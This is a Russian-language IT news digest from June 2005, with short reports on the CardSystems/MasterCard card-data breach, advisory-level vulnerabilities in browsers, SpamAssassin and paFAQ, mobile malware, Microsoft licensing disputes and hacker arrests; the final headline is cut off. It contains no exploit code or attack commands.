Компания "Сигнал-КОМ" выпустила новую клиентскую версию системы Inter-PRO Mobile, дополняющей линейку продуктов программного комплекса Inter-PRO, предназначенного для обеспечения криптографической защиты информационных систем, построенных на базе Web-технологий. Версия Inter-PRO Mobile спроектирована для работы на устройствах Pocket PC (с процессорами семейства ARM), функционирующих под управлением операционных систем Windows CE 3.0 (Microsoft Pocket PC 3.0), Windows CE 4.2 (Microsoft Pocket PC 4.2) или Windows Mobile 2003. С помощью Inter-PRO Mobile пользователи Pocket PC получают возможность управлять своим счетом из любого места, где есть мобильный доступ в Internet, не опасаясь злоумышленников. При интеграции с системами типа "банк-клиент", базирующихся на Web-технологиях и ориентированных на дистанционное обслуживание клиентов через Internet, Inter-PRO обеспечивает строгую аутентификацию клиента и сервера на основе цифровых сертификатов X.509, конфиденциальность и целостность информации, передаваемой по протоколу HTTP, формирование и проверку в режиме on-line цифровых подписей HTML-форм, фильтрацию трафика и разграничение доступа к ресурсам Web-сервера по параметрам цифровых сертификатов X.509. Продукт Inter-PRO соответствует требованиям федерального закона РФ "Об электронной цифровой подписи" и выполнен с использованием средства криптографической защиты информации "Крипто-КОМ 3.1".
"Открытые системы"

22/06/2005 13:05 Смартфоны: новая мишень для крупномасштабных атак
Угроза крупномасштабных вирусных атак на смартфоны и КПК нарастает с каждым днем, считают аналитики Gartner. Двумя главными факторами, которые создают среду для распространения «мобильных» вирусов, являются рост числа смартфонов, которые будут составлять треть всех мобильных устройств к концу 2007 года, и свободный обмен исполняемых файлов между пользователями. Когда смартфоны достигнут критической массы, антивирусное ПО на стороне клиента не сможет обеспечить эффективной защиты, подобно тому как клиентские антивирусы для ПК потеряли эффективность с переходом к компьютерным сетям. К этому времени станут необходимы новые интеллектуальные инструменты для защиты всей сети. В ближайшие 18 месяцев крупномасштабных вирусных атак на смартфоны не следует опасаться. Микко Хиппонен (Mikko Hypponen), директор антивирусных исследований в F-Secure, не ожидает массивных атак на мобильники вирусов типа Slammer или Sasser в ближайшие год-два, однако отмечает, что отдельные нападения уже начались. Например, вирус Commwarrior уже может эффективно распространяться через службу MMS.
Источник

22/06/2005 12:44 В нескольких браузерах найдена уязвимость
Российские эксперты по информационной безопасности обнаружили уязвимость в браузерах разных производителей, которая позволяет удаленному пользователю произвести XSS-нападение и получить доступ к потенциально важным данным других пользователей. Браузеры отображают диалоговое окно, не указывая источник его создания. Удаленный пользователь может создать специально сформированную HTML-страницу, которая отобразит диалоговое окно от имени доверенного сайта, что может позволить злоумышленнику получить личные данные пользователей (пароль, номер кредитной карты и т.д.). Уязвимы Internet Explorer 6.0, Opera 8.0, Safari 2.0 (412), iCab 2.9.8, Mozilla 1.7.8, FireFox 1.04, Camino 0.8.4.
Описание уязвимости

22/06/2005 12:21 Взлом базы MasterCard: вину валят на русских
Обнародуются новые подробности взлома, потенциальными жертвами которого стали более 40 млн. владельцев кредитных карт MasterCard. Появляются также слухи о том, что к беспрецедентному по своему масштабу взлому приложили руку российские хакерские группировки, однако серьезных доказательств этому пока нет. О «русском следе» в истории со взломом MasterCard сообщил вчера американский телеканал ABC News. По его информации, некоторые из 40 млн. взломанных номеров кредитных карт уже продаются на «российском веб-сайте» (каком именно, не называется), а некоторые владельцы карточек уже обнаружили на своих счетах утечку денег. ABC приводит цитату Джона Уоттерса (John Watters) из компании iDefense, который утверждает, что на прошедших выходных в русскоязычных чатах было много разговоров, касающихся взлома MasterCard: сам факт расценивается там как «большая победа хороших парней», входящих в хакерские группировки. Тем не менее, никаких серьезных доказательств в пользу «русского следа» приведено не было: создается впечатление, что информация о «плохих русских» притянута за уши. По оценкам г-на Уоттерса, номер обычной карты Mastercard стоит на черном рынке свыше $42, а номера «золотых» и «серебряных» карт с высоким кредитным лимитом обойдутся почти в $70. Однако теперь, когда о взломе MasterCard стало известно всем, цены на украденную информацию должны упасть, утверждают в iDefense.
Подробности на CNews

22/06/2005 11:40 Sun опять пытается поделиться Java; и это снова не open source
Sun Microsystems вновь пробует сделать свое серверное ПО Java открытым — на этот раз, запустив проект GlassFish, который позволяет посторонним экспериментировать с исходным кодом, но все же до настоящего проекта open source ему еще далеко. 6 июня Sun втихомолку открыла проект GlassFish и планирует рассказать о нем на своей конференции JavaOne, которая начнется на будущей неделе в Сан-Франциско. Проект предоставляет доступ к исходному коду Sun Java System Application Server Platform Edition 9 на условиях лицензии Java Research License (JRL), которая не дает полных прав open source, таких как право на повторное распространение ПО или на его использование вне рамок исследовательских проектов. На веб-сайте Sun сказано: «GlassFish — это окно и точка входа в процесс разработки Sun, через которое члены сообщества могут знакомиться с исходным кодом, вносить усовершенствования и участвовать в технических обсуждениях… GlassFish — это возобновление партнерства между Sun и широким сообществом enterprise Java». А скорее, возобновление усилий компании, придумавшей Java, сделать свой сервер Java-приложений более значимым. Он все еще не завоевал такой популярности, как у конкурирующих продуктов от IBM, BEA Systems и JBoss. В предпринятой в 2003 году попытке привлечь внимание к своему продукту Sun начала бесплатно распространять минимальную версию Platform Edition.
Подробности

22/06/2005 10:35 Cisco Systems хочет стать производителем ПО
Ведущий мировой производитель сетевого компьютерного оборудования Cisco Systems объявил о том, что намеревается приступить к созданию программных решений, призванных выполнять посреднические функции между аппаратной и программной частью компонентов компьютерных сетей. Как сообщает издание CNET News.com, руководство компании объявило о начале направленной на это производственной программы Application-Oriented Network (AON, "программно-ориентированные сети"). В рамках программы компания планирует создать новый класс приложений, которые будут играть роль "прослойки" между непосредственно аппаратным обеспечением сетей и сетевыми приложениями. Это, согласно планам компании, позволит более эффективно строить сети, управлять ими и реализовывать новые возможности. О планах по поддержке проекта AON уже объявили партнеры Cisco - IBM, SAP и Tibco Software.
Подробнее

21/06/2005 15:39 Компьютерные игры убили подростка
Екатеринбургский подросток погиб после 12 часов непрерывной игры на компьютере. Полдня, проведенные в компьютерном клубе, спровоцировали у 12-летнего подростка инсульт. Врачи, которые несколько дней боролись за жизнь мальчика, не смогли его спасти. Вскрытие показало, что мозг юного любителя компьютерных игр был полностью разрушен. Как сообщили в пресс-службе городского управления здравоохранения г. Екатеринбурга, трагедия началась на прошлой неделе. Известно, что мальчик пришел в игровой клуб и провел за компьютером в несколько раз больше времени, чем позволяют правила. Вернувшись домой, ребенок начал вести себя неадекватно, матери пришлось вызвать для него «скорую помощь». Мальчик был госпитализирован, пролежал в реанимации семь дней, после чего умер. Медики склонны считать, что компьютерные игры послужили катализатором для болезни: они спровоцировали приступ, дав толчок к развитию патологии мозга, имевшейся у ребенка. Врачи детской городской больницы № 9, куда был доставлен мальчик, говорят, что каждую неделю к ним поступает минимум по одному подростку, попавшему в зависимость от компьютерных игр. Сейчас в России, по данным исследований, до 80% школьников в возрасте 12-13 лет страдают компьютерной зависимостью. Дети сутками без еды и отдыха могут находиться перед компьютером дома или в специализированных клубах.
Источник

21/06/2005 14:47 Уязвимость в SpamAssassin 3.0
В SpamAssassin 3.0.1, 3.0.2 и 3.0.3 найдена уязвимость, которая позволяет удаленно вызвать отказ в обслуживании (DoS) приложения. Удаленный пользователь может послать целевой службе сообщение со специально сформированными заголовками, вследствие чего SpamAssassin понадобится большое количество ресурсов и времени для обработки этого сообщения. Уязвимости присвоен уровень опасности «средняя». Ошибка исправлена в релизе SpamAssassin 3.0.4.
Источник

21/06/2005 13:57 Microsoft препятствует "открытию" Avalon и Indigo
Несмотря на существование Mono, открытой реализации CLR (Microsoft.NET), компания Microsoft не намерена быть столь либеральной в отношении Avalon и Indigo, двух компонент Windows Longhorn. Выпуск Mono стал возможным потому, что спецификации .NET являются стандартами ECMA, что допускает их свободную реализацию. В отношении Avalon/Indigo корпорация намерена применять другой подход, требующий лицензирования. Нечто подобное имеет место и в отношении форматов XML Office 12, условия использования которых не совместимы с GPL (но совместимы с некоторыми другими открытыми лицензиями).
Подробности

21/06/2005 13:38 Хакеры переходят к точечным атакам
Хакерские атаки набирают силу, число пострадавших от их действий растет. При этом хакерские нападения становятся все более сфокусированными. Они все меньше надеются на вирусы, рассылаемые по всему земному шару. Внимание интернет-преступников все чаще привлекают конкретные компании, они сосредотачивают на них свои усилия, которые обычно завершаются прибыльным для хакеры успехом. Убытки от хакерских действий могут быть воистину огромными. Так, MasterCard недавно сообщила о том, что в руки неизвестного злоумышленника попади данные о 40 млн кредитных и дебетовых карт. Хакер смог проникнуть в сеть компании и установить на одном из компьютеров вредоносный скрипт, благодаря которому он и смог узнать конфиденциальные сведения, передает Reuters. Хакерский скандал недавно разгорелся в Израиле. Полиция возбудила уголовное дело по факту коммерческого шпионажа, который осуществлялся посредством троянской программы. Как передает Reuters слова специалистов по безопасности, такие точечные атаки вскоре станут весьма распространены. Специалисты также утверждают, что в хакерской среде популярным стало писать вирусы под конкретную задачу, а не использовать уже готовые разработки. По информации компании MessageLabs, с января сего года количество точечных хакерских атак выросло на 150%. По мнению экспертов, этот рост связан с тем, что хакерам мало-помалу начинает надоедать заниматься взломом и распространением вирусов ради искусства. Они зачастую вливаются в преступные группировки и начинают работать на заказ с конкретной целью наживы. У точечных атак есть также и другой плюс для хакера. Такие атаки обычно расследуются локально, без привлечения серьезных сил полиции и лишней шумихи.
"Вебпланета"

21/06/2005 12:53 Rambler и ICQ запустили русскоязычный вариант "аськи"
Компания ICQ Inc., разработчик популярного интернет-пейджера ICQ и дочерняя компания холдинга America OnLine (AOL), представила совместно с российской компанией Rambler Media русскоязычный вариант сервиса ICQ, позволяющий также использовать все сервисы Rambler. Как говорится в сообщении компании "Рамблер", продукт под совместным брэндом ICQ-Rambler объединит популярную в России программу мгновенных сообщений ICQ и услуги, предоставляемые порталом Rambler, ориентированные на русскоязычных пользователей Интернета. На этой неделе впервые в истории пользователи программы ICQ могли увидеть на стартовой заставке ICQ (известной также как "Welcome Screen") контент на русском языке, предоставленный Rambler. - включая поиск Rambler, прогноз погоды и курсы валют, новости Rambler Mass Media и Lenta.ru, и вход на другие сервисы портала.
Источник

21/06/2005 12:24 Microsoft блокирует Firefox на собственных сайтах
Довольно любопытное оставил Robert Acceltura. Оказывается, при обращении на сайты компании Microsoft просиходит блокирование показа страницы, если браузер обратившегося отличен от сами_знаете_какого браузера. При этом выводится сообщенние: "Sorry, we are unable to show you the page you requested. Please try again later". Если же изменить тип браузера при обращении к сайтам (например, встроенными свойствами браузера или proxomitron) - то страницы отображаются корректно.
Подробное описание

21/06/2005 11:32 Заплата для "пробелов" в сотовых сетях
В фирме Nuera Communications разработана система, позволяющая делать VoIP-звонки с сотовых телефонов. Решение адресуется операторам сетей мобильной связи в качестве средства обеспечения покрытия территорий, на которых размещение базовых станций затруднено, например, внутри зданий или в подземных гаражах. Прототип системы, включающий VoIP-шлюз, точку доступа беспроводной локальной сети и программный телефонный коммутатор, был продемонстрирован на выставке CommunicAsia 2005 в Сингапуре. Система также предусматривает необходимость использования телефона с поддержкой WLAN и интерфейса UMA (Unlimited Mobile Access) для IP-сетей. Как обещают в Nuera, ее VoIP-решение позволит поставщикам сервисов широкополосной передачи данных предлагать услуги голосовой связи внутри зданий с возможностью автоматического переключения вызова в сотовую сеть, когда абонент покидает пределы дома.
"Открытые системы"

21/06/2005 11:17 В популярной FAQ-системе найдены опасные изьяны
Российские эксперты обнаружили множественные уязвимости в программе paFAQ, позволяющей создавать раздел FAQ (часто задаваемых вопросов) на веб-странице. PaFAQ выполняется с использованием PHP и MySQL. Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS-нападение, выполнить произвольные SQL-команды в базе данных и скачать базу данных. Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в сценарии index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML-сценарий в браузере жертвы в контексте безопасности уязвимого сайта. SQL-инъекция возможна из-за недостаточной обработки входных данных в переменной username. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL-команды в базе данных приложения. Для успешной эксплуатации опция magic quotes gpc должна быть выключенной в конфигурационном файле php (значение по умолчанию). Также удаленный пользователь может запросить сценарий admin/backup.php и скачать базу данных приложения. Уязвима версия paFAQ 1.0 Beta 4. «Дырам» присвоен рейтинг опасности «высокая». Для использования уязвимостей есть эксплойт.
Источник

21/06/2005 10:35 Opera: «данные о пользователях Firefox завышены»
Производитель конкурирующего браузера утверждает, что из-за специфической особенности Firefox приводятся нереалистичные цифры его доли рынка. В понедельник глава Opera Software заявил, что статистика доли рынка Mozilla Firefox завышена из-за поддерживаемой этим браузером функции предварительной выборки страниц (link prefetching). Этот механизм позволяет браузеру использовать время простоя для загрузки веб-страниц, которые пользователь может посетить в ближайшем будущем. В Firefox 1.0 он включен по умолчанию. В начале июня Google реализовал поддержку предварительной выборки страниц, и теперь Firefox заранее загружает в кэш верхние строчки результатов поиска. Согласно последним данным компании OneStat.com, измеряющей веб-трафик, доля рынка Firefox и Opera составляет соответственно 8,7% и 1,0%. (Доминирующий веб-браузер Microsoft Internet Explorer установлен у 86,6% пользователей.) Однако генеральный директор Opera Йон фон Тежнер утверждает, что доля рынка Opera, вероятно, выше, чем предполагает статистика, так как он не поддерживает pre-fetching и у него более эффективный механизм кэширования. «К сожалению, статистика недооценивает Opera и переоценивает Firefox. У Opera более совершенный механизм кэширования, поэтому он обращается к веб-сайтам не так часто, как другие браузеры. В Firefox добавлена функция предварительной выборки, которой воспользовался Google. Это приводит к завышению статистических данных», — сказал Тежнер. Механизм кэширования Opera — не единственная особенность браузера, приводящая к недооценке его доли рынка. По умолчанию Opera сконфигурирован так, что идентифицирует себя как Internet Explorer — чтобы браузер представлялся правильно, пользователям приходится менять этот параметр вручную.
Подробнее

21/06/2005 10:09 Хакеры взломали сайт китайского агентства по интернет-безопасности
Китайские хакеры атаковали сайт государственного агентства по безопасности, которое отвечает за проведение нынешней политики властей страны по установлению жесткого контроля за Интернетом. Как сообщает в понедельник газета Financial Times, хакерам удалось взломать сервер, где располагается сайт Пекинской главной службы безопасности (Beijing General Security Service Co) и заменить его главную страницу на извещение о взломе, в котором также содержались нелицеприятные отзывы о качестве работы агентства по цифровой безопаности, которое само себя не может защитить. В настоящее время указанная служба проводит кампанию по набору "интернет-полиции" - группы надзирателей, следящих за содержимым китайских сайтов, форумов и блогов с целью недопустить появления там информации, противоречащей линии Компартии Китая. Как известно, власти КНР разрешают жителям страны использовать Интернет только для "разрешенных" видов информационной активности, блокируя "неугодные" зарубежные ресурсы и преследуя таковые на своей территории.
Подробности

20/06/2005 14:34 Новый Netscape совместим с IE
Netscape выпустила обновленную версию одноименного браузера, в котором решена проблема несовместимости с Microsoft Internet Explorer. По словам производителя, Netscape 8.02 не нарушает чтение языка XML в Internet Explorer. Установка предыдущей версии Netscape 8 на компьютер приводила к показам страниц IE с XML как пустых. В связи с этим Microsoft рекомендовала всем своим пользователям удалить конкурирующий браузер с машин. Представитель AOL (владельца Netscape) Андрю Вейнштейн (Andrew Weinstein) заявил, что проблема заключается не в Netscape, а в ошибке Internet Explorer.
Источник

20/06/2005 13:41 Выход Astaro Security Linux 6.0
Объявлено о выпуске новой версии Astaro Security Linux 6.0, сообщает linux.org.ru. Astaro Security Linux 6.0 - это набор высококачественных средств защиты (среди которых вы найдете межсетевой экран, антивирусные программы, средства борьбы со спамом и шпионским ПО, систему предотвращения вторжений и др.) управление которыми осуществляется с единого интерфейса. Как утверждается в основе Astaro Security Linux лежит операционная система Linux, переработанная специалистами компании Astaro.
Подробности

20/06/2005 12:33 Microsoft работает над файлообменной системой
В Microsoft идет работа над собственным Р2Р-приложением для обмена файлами, с кодовым названием Avalanche. Проект, представленный британскими разработчиками на «Дне открытых дверей» Microsoft в Кембридже, — это собственная версия технологии распределенного файлообмена типа BitTorrent, сделанная компанией. Avalanche строится на отличной от BitTorrent системе, однако обе технологии, по существу, предназначены для одной и той же цели — распространения крупных файлов между многими пользователями. В случае с BitTorrent это, в основном, загрузка дистрибутивов Linux и взломанных версий кинофильмов. В Avalanche, как заявил представитель Microsoft, никаких сетевых шалостей не будет: «Там предусмотрена строгая защита, гарантирующая однозначную идентификацию поставщиков контента и предотвращающая несанкционированное предложение контента для загрузки кем бы то ни было». Принцип работы BitTorrent заключается в том, что информация, то есть файлы, разбивается на отдельные фрагменты. Чтобы составить файл, пользователь BitTorrent должен собрать все эти фрагменты. Однако некоторые из них предлагаются чаще, чем другие, что может создать проблемы. В Avalanche для составления целого файла не обязательно иметь в наличии все его фрагменты. Недостатком системы Avalanche является то, что пользователи могут в конечном счете загрузить больше таких фрагментов, чем это необходимо. Но Microsoft уверяет, что ее система эффективнее, так как нагрузка распределена более равномерно.
Подробности

20/06/2005 11:51 Украденные банковские данные хранились неподобающим образом
Один из руководителей компании CardSystems Solutions, ответственной за утечку информации о платежных реквизитах 40 миллионов пользователей банковских карт, признал, что украденные, предположительно, в результате хакерской атаки, данные, хранились в компании неподобающим образом, сообщает газета New York Times. После того, как об утечке в минувшие выходные было публично объявлено администрацией системы MasterCard, компании, работающие с CardSystems Solutions, выразили недоумение по поводу факта обнародования информации, которую ФБР США ранее обнародовать запретило. Утечка была обнаружена еще 22 мая, известно, что из потенциально подвергшихся риску 40 миллионов реквизитов однозначно украденными можно назвать около 200 тысяч. Партнеры базирующейся в Атланте CardSystems Solutions отмечают, что компания вообще не должна была хранить большинство реквизитов, о которых идет речь, в своих базах - этого требуют правила работы, выработанные системами Visa и MasterCard. Она должна была удалять эти данные после совершения транзакций, которые через нее проходили, однако, как признал испольнительный директор CardSystems Solutions Джон Перри (John Perry), она этого не делала. По словам Перри, многие подлежащие удалению из базы реквизиты хранились "в экспериментальных целях", так как компания вела работу над выявлением ошибок, из-за которых некоторые транзакции оставались в базе помеченными как неавторизованные или незавершенные. "Мы не должны были так поступать," - признал Перри. Также отмечается, что критичные данные хранились во взломанной системе CardSystems в "явном виде" в файле, который можно легко экспортировать (что, по всей видимости, и было сделано с помощью внедренной хакерами в систему "троянской" программы). Перри также отметил, что подобным способом хранить такие данные не следует, и компания больше не будет так поступать.
Источник

20/06/2005 11:25 Московская хельсинкская группа обратилась в прокуратуру по факту взлома своего сайта
Группа российских правозащитников направила в органы прокуратуры и МВД обращение в связи с серией акций против нескольких интернет-сайтов, проведенных хакерами от имени ряда ультраправых движений. Как ранее сообщалось, на позапрошлой неделе был взломан сайт Московской хельсинкской группы (МХГ), сайт Федерации еврейских общин России Jewish.Ru, а также ряд других сайтов правозащитных и политических организаций, которые ультраправые движения считают своей оппозицией. "Предположительно, речь идет о спланированной акции, подготовленной экстремистами - национал-социалистами, которые стремятся уничтожить своих идеологических противников таким незаконным способом. Взлом сайта они расценивают как акцию протеста. В качестве мишеней они выбирают либеральные политические и правозащитные ресурсы, а также сайты, рассказывающие о еврейской культуре", - говорится в поданном в прокуратуру заявлении от имени главы МХГ Людмилы Алексеевой. В документе также говорится: "Явление получило собственное название: хактивизм (hacktivism). Излюбленным приемом хактивистов стала замена "фасада" атакованного веб-сайта на страницу со своими политическими лозунгами и графикой (т.н. deface)". "Анализируя информацию, размещаемую на указанных сайтах, можно сделать вывод, что авторы проповедуют превосходство русских и ненавидят всех остальных, а мы, правозащитники, считаем, что людей не следует делить по национальному признаку и религии", - отмечается в обращении. В нем также сказано: "С нашей точки зрения, модификация главной страницы официального сайта МХГ была проведена в такой форме, которая дает основания полагать, что действия неустановленных лиц были направлены на возбуждение национальной вражды и пропаганду через СМИ превосходства граждан по признаку их отношения к национальной или расовой принадлежности." Авторы обращения считают, что действия взломщиков содержат признаки преступлений, предусмотренных частью 2 статьи 272 УК РФ - "неправомерный доступ к компьютерной информации" и частью 2 статьи 282 УК РФ - "возбуждение национальной, расовой или религиозной вражды" и просят прокуратуру принять решение о возбуждении уголовного дела.
Заявление

19/06/2005 15:19 Новый формат Microsoft Office несовместим с GPL
Новая свободная лицензия Microsoft, под которой корпорация планирует опубликовать свои форматы для офисных приложений (Office Open XML Formats), несовместима с GNU General Public License и не облегчит жизнь разработчикам программного обеспечения с открытым кодом. Microsoft опубликовала Office 2003 XML Reference Schemas еще в конце 2003 года, а ранее в этом месяце представители корпорации сообщили, что формат XML будет использоваться по умолчанию в Office 12 (который выйдет в следующем году) и доступен всем по свободной лицензии. Но Ричард Столлман (Richard Stallman), президент Организации свободного программного обеспечения (Free Software Foundation, FSF) и автор GNU GPL, опроверг любые мнения о том, что этот шаг как-то облегчит жизнь сообществу свободного ПО. Условия представленной лицензии по использованию этих форматов «созданы для того, чтобы препятствовать всему свободному программному обеспечению. Ими затрагивается только код, отвечающий за форматы Microsoft, что означает, что сама программа под этой лицензией не может быть модифицирована», заявил Столлман. «Право модифицировать программное обеспечение для частного использования и право публиковать модифицированные версии — это два важнейших составляющих определения свободного ПО. Если таких прав нет, то и программа не является свободной», — отметил Столлман. Джин Паоли (Jean Paoli), старший директор XML-архитектуры в Microsoft, подчеркивает, что «данный шаг [переход к открытым файловым форматам XML] показывает, что Microsoft отказывается от бинарного содержимого, к которому никто не может получить доступ». "Я не юрист и не являюсь большим знатоком в этой области, но GPL может и не позволять включение в программы кода от компаний вроде Microsoft. Однако, насколько мне известно, некоторые другие лицензии Open Source совместимы», — добавляет Паоли.
Nixp.Ru

19/06/2005 14:54 SchilliX - первый дистрибутив на базе OpenSolaris
На базе недавно опубликованных исходных текстов OpenSolaris, выпущен первый публично распространяемый дистрибутив - SchilliX, сообщает opennet.ru. SchilliX может не только устанавливаться на жесткий диск, но и использоваться как LiveCD, предоставляя возможность работы прямо с CD-ROM или USB-Flash. Поддерживаются платформы X86, AMD64 и EMT64. Система основана на Solaris "Nevada" Build 17+.
Подробности

19/06/2005 13:11 Украинские власти легализуют ПО Microsoft
Министерство образования и науки Украины и компания Microsoft Ireland Operations Limited подписали договор о легализации компьютерных программ компании Microsoft, предусматривающий оптимизацию затрат государственного бюджета. Согласно договору, государственным органам предоставляется возможность на льготных условиях в период с 2005 по 2007 год привести программное обеспечение компании Microsoft, которое они используют в своей работе, в соответствие с действующим законодательством путем планомерной замены нелицензионных версий программ на лицензионные, а также осуществить поточное приобретение компьютерных программ по специальным льготным ценам. На основании договора и в порядке, установленном законодательством о закупке товаров, работ и услуг за государственные средства, государственные органы самостоятельно осуществят закупку лицензионных версий компьютерных программ на тендерной основе. Во время проведения тендерных процедур государственные органы власти будут иметь возможность выбрать из списка партнеров украинского офиса Microsoft компанию, которая предоставит им наиболее благоприятные ценовые и другие условия. При этом подписание договора не обязывает и не дает рекомендаций государственным органам относительно приобретения исключительно программного обеспечения Microsoft.
Источник

19/06/2005 12:37 Крупнейшие поставщики ПК отказались от поддержки Windows XP N
Решение Европейской комиссии (ЕК) в отношении Microsoft может обернуться для корпорации непредвиденными проблемами. Появившаяся версия Windows XP N, в которой не предустановлен Media Player, уже отпугнула некоторых ключевых сборщиков компьютеров. Четыре крупные компании объявили о том, что пока у них нет планов о поддержке новой операционной системы, которая вчера поступила на европейский рынок. Dell, Hewlett-Packard, Lenovo и Fujitsu Siemens аргументировали свое решение отсутствием должного интереса к ОС со стороны конечных пользователей. Таким образом, компании фактически отказались от предварительной инсталляции Windows XP N на компьютеры собственной сборки. Представитель Dell пояснил во вторник, что покупатели заинтересованы в полноценных решениях, то есть с Windows Media Player. «Наша компания продолжит поставлять на европейский рынок настольные компьютеры Dimension и ноутбуки Inspiron под управлением ОС Windows со встроенными мультимедийными возможностями», — рассказал сотрудник Dell. Остальные компании выразили сходную точку зрения. «В текущем году HP не планирует устанавливать Windows XP Professional Edition N на свои ноутбуки», — сказал представитель Hewlett-Packard. Менеджер Lenovo отметил, что «пока инсталляция новой ОС на компьютеры не планируется, но мы продолжим следить за потребностями покупателей».
Источник

19/06/2005 10:34 Украинский "хакер" задержан в Тюмени
Стремление "срубить денег по-лёгкому" обернулось скамьёй подсудимых для украинского хакера, обосновавшегося в Тюмени. 29-летний программист, работавший по найму в одной из тюменских строительных организаций, имея доступ в Интернет, прочитал на сайте объявление о помощи во взломе программы "Бухгалтерия". По словам Алсу Мадьяровой, помощника прокурора Ленинского округа Тюмени, прекрасно разбираясь в компьютерах и программах, он согласился помочь за деньги и оставил свой адрес в почте. Через некоторое время с ним договорился о встрече мужчина. При наличии хакерской программы, купленной на киевском рынке, украинский вундеркинд быстро справился с криминальным заданием и… попался оперативнику отдела "К" ГУВД Тюменской области, выступавшем в роли заказчика. У хакера изъяты триста рублей гонорара, полученных за работу взломщика. Не так давно состоявшийся суд приговорил компьютерного "гения", покусившегося на интеллектуальную собственность, к году лишения свободы с условным сроком содержания и штрафу в размере пяти тысяч рублей.
Источник

19/06/2005 10:13 MasterCard объявила о крупнейшем взломе платежных систем
В результате возможно имевшего места взлома злоумышленники могли получить доступ к банковским счетам держателей 40 миллионов платежных карт разных систем, в том числе 13,9 миллиона карточек MasterCard. Об этом сообщается в официальном заявлении, которое было опубликовано в пятницу на сайте MasterCard International. Согласно документу, "дыра" была обнаружена в системе безопасности процессингового центра компании CardSystems Solutions Inc., которая в том числе обслуживает транзакции платежных систем. В компьютерной сети этой компании был найден вирус, который перехватывал передаваемую по ней информацию о картодержателях. При этом на сайте CardSystems Solutions сообщается, что "потенциальная проблема безопасности" была обнаружена еще 22 мая. Представители компании уведомили об этом своих партнеров и ФБР, однако бюро запретило обнародовать эти данные. В связи с этим CardSystems выражает недоумение решением MasterCard опубликовать соответствующее заявление. При этом представители платежной системы Visa от каких-либо комментариев по данному вопросу отказываются, отмечает Associated Press, а на сайте этого крупнейшего конкурента MasterCard не содержится каких-либо заявлений о возможной утечке.
Официальное заявление MasterCard

18/06/2005 15:21 Opera законопатила дырки
Opera Software выпустила пакет обновлений для восьмой версии браузера. Как передает TechWeb, патч был выпущен в минувший четверг и содержит в себе не только заплатки для дырок в системе безопасности, но и несколько новых функций. В Opera 8.01 устранены все 5 критических уязвимостей, в том числе и те, которые фишеры могли использовать для спуфинга. Также теперь в браузере присутствует функция Browser JavaScript — специальный JavaScript файл, который исправляет артефакты при рендеринге страниц браузером. Правда, специалисты Opera предупреждают, что функция по умолчанию отключена, и ее включение может сказаться на производительности программы. Остальные элементы обновления предназначены для упрочения стабильности браузера.
Источник

18/06/2005 14:09 Opanki поразил корпоративную сеть НР
Новый компьютерный червь распространялся некоторое время через сервис мгновенного обмена сообщениями AIM America Online. Сейчас AOL установила фильтр, полностью блокировавший вредоносный код. Эксперты IMlogic идентифицировали червя как вариант Opanki, впервые появившегося в прошлом месяце. Сообщение с текстом Lol look at him имеет гиперссылку на файл рicture.pif, при загрузке которого происходит заражение. Попав на компьютер, червь рассылает себя по всем адресам, найденным в списке AIM Buddy List. Opanki удалось распространиться в корпоративной среде компаний Hewlett-Packard и Palo Alto.
CNews

18/06/2005 13:45 Microsoft урезает поддержку Windows 2000
С 30 июня 2005 г. корпорация Microsoft переводит поддержку Windows 2000 из разряда мainstream в extended. Это значит, что часть обновлений и консалтинговых услуг для пользователей данной ОС передут в разряд платных. Этот шаг предпринят Microsoft несмотря на то что Windows 2000 остается наиболее распространенной (более 50%) среди крупных компаний с числом компьютеров более 250. По данным AssetMetrix, данная платформа потеряла популярность в корпоративном секторе всего на 4% (с 52% до 48%) за период с 4-го квартала 2003 г. по 1-й квартал 2005 г. (распространенность Windows XP в этом секторе за данный период выросла с 6,6% до 38%).
Источник

18/06/2005 13:24 Пассажиры московского метро смогут выходить в Интернет
К концу лета москвичи получат возможность пользоваться интернетом на трех станциях московского метрополитена, сообщает информационный центр правительства Москвы. Точки беспроводного доступа в Сеть будут установлены на станциях "Охотный ряд", "Театральная" и "Площадь революции". Воспользоваться услугой смогут владельцы смартфонов, КПК и ноутбуков, оборудованных контроллерами беспроводной связи Wi-Fi. За один час пользования интернетом придется выложить 180 рублей. Зона покрытия одной точки доступа в метрополитене составит около 100 метров, скорость передачи данных - до 5 Мбит/с. В скором времени пассажиры метро получат доступ в онлайн и на других станциях столичной подземки, которые оснастят хот-спотами.
Источник

18/06/2005 13:07 Хакеры обошли защиту Playstation Portable
Хакерам удалось взломать защиту карманной игровой приставки Sony Playstation Portable (PSP). Как сообщает Associated Press, умельцы научились запускать на PSP нелицензионное программное обеспечение и игры. Технология обхода защиты сводится к трюку с использованием двух карт памяти Memory Stick, которые необходимо поменять местами в процессе работы устройства. Однако подобная операция в некоторых случаях может приводить к повреждениям приставки. К тому же "обмануть" Playstation Portable удастся только в том случае, если приставка использует микропрограмму версии 1.5. В настоящее же время устройства поставляются с модифицированной "прошивкой" версии 1.51 (также доступна для загрузки), которая обеспечивает более надежную защиту и не позволяет запускать пиратское ПО вышеописанным способом.
Источник

18/06/2005 12:45 Милиционер-хакер продавал в сети порнографию и нелицензионные программы
В городе Ижевск (Удмуртия) прокуратура возбудила уголовное дело против капитана милиции, подозреваемого в распространении контрафактного программного обеспечения для компьютеров и порнографии. Об этом корреспонденту ИА REGNUM сообщил источник в МВД. По данным следствия, 27-летний старший инженер отдела спецсвязи и автоматизации службы тыла МВД Удмуртии продавал в сети нелицензионную версию "1С"-бухгалтерия и материалы порнографического характера. Помимо это, милиционер распространял вредоносные программы - вирусы.
Источник

18/06/2005 12:00 Техника проброса туннеля через ICMP
В статье "Case of a wireless hack" демонстрируется создание туннеля через ICMP пакеты, используя программу icmp_tunnel, сообщает opennet.ru. Утилита icmp_tunnel, была написана исходя из факта отсутствия тарификации ICMP трафика (или просто пакетов очень малого размера) у многих операторов, предоставляющих доступ посредством WiFi hotspot
Статья

18/06/2005 11:37 «Лаборатория Касперского» представляет три новые системы защиты Linux-платформ
